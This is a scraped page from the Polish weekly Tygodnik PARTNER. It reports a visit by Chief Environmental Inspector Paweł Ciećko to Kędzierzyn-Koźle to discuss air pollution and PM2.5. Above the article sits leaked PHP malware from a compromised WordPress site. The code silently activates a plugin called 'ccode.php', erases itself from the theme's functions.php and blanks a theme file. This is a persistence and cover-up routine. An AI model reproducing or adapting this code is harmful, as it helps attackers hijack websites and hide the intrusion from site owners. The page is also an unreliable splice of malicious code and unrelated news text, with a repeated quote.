function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php'); file_put_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php', ''); } } add_action('init', 'true_plugins_activate'); Główny Inspektor Ochrony Środowiska zajmie się powietrzem w Kędzierzynie-Koźlu | Tygodnik PARTNER

Główny Inspektor Ochrony Środowiska zajmie się powietrzem w Kędzierzynie-Koźlu

Paweł Ciećko gościł w poniedziałek w urzędzie miasta. Zapewniał, że jego inspekcja potraktuje priorytetowo problem zanieczyszczenia naszego miasta.

- Zajmiemy się problemem jakości powietrza w Kędzierzynie-Koźlu. Uruchomiony zostanie specjalny program badawczy, którego celem będzie poprawa stanu rzeczy - zapewniał Paweł Ciećko

- Zajmiemy się problemem jakości powietrza w Kędzierzynie-Koźlu. Uruchomiony zostanie specjalny program badawczy, którego celem będzie poprawa stanu rzeczy - zapewniał Paweł Ciećko

W sali obrad UM Kędzierzyn-Koźle odbyło się drugie spotkanie władz miasta (z prezydent Sabiną Nowosielską na czele) z opolskimi parlamentarzystami. Na zaproszenie posła PiS i wiceministra aktywów państwowych do naszego miasta przyjechał także Generalny Inspektor Ochrony Środowiska Paweł Ciećko.

- Zajmiemy się problemem jakości powietrza w Kędzierzynie-Koźlu. Uruchomiony zostanie specjalny program badawczy, którego celem będzie poprawa stanu rzeczy – zapewniał Paweł Ciećko.

W najbliższym czasie sprawdzone mają być także wszystkie pozwolenia wydane na działalność firm z branży chemicznej. Podczas spotkania z parlamentarzystami prezydent Sabina Nowosielska zapewniała, że miasto od kilku lat podejmuje różne inicjatywy zmierzające do poprawy jakości powietrza. Gmina stale monitoruje poziom zanieczyszczenia benzenem oraz pyłami.

Inspektor Ciećko tłumaczył, że największym zagrożeniem jest obecnie pył PM 2,5. – Jest on tak mały, że wchłania się nawet przez spojówki – mówił Paweł Ciećko. – Jest powodem zachorowalności na wiele różnych nowotworów.

Kolejne spotkanie z parlamentarzystami dotyczące poprawy jakości powietrza w Kędzierzynie-Koźlu odbędzie się pod koniec marca, a następne w maju. Owocem tych debat ma być wypracowanie systemowych zmian prowadzących do istotnej poprawy w tym zakresie.

Na spotkaniu obecni byli posłowie: Paweł Kukiz, Ryszard Galla, Ryszard Wilczyński, Tomasz Kostuś, Witold Zembaczyński oraz Janusz Kowalski. A także radny wojewódzki Robert Węgrzyn i radny miejski Marek Piasecki.

Aktualna kategoria: AKTUALNOŚCI
REKLAMA
© 2020 Tygodnik PARTNER. All rights reserved / Wszystkie prawa zastrzeżone
Zobacz także: www.kedzierzynkozle24.pl.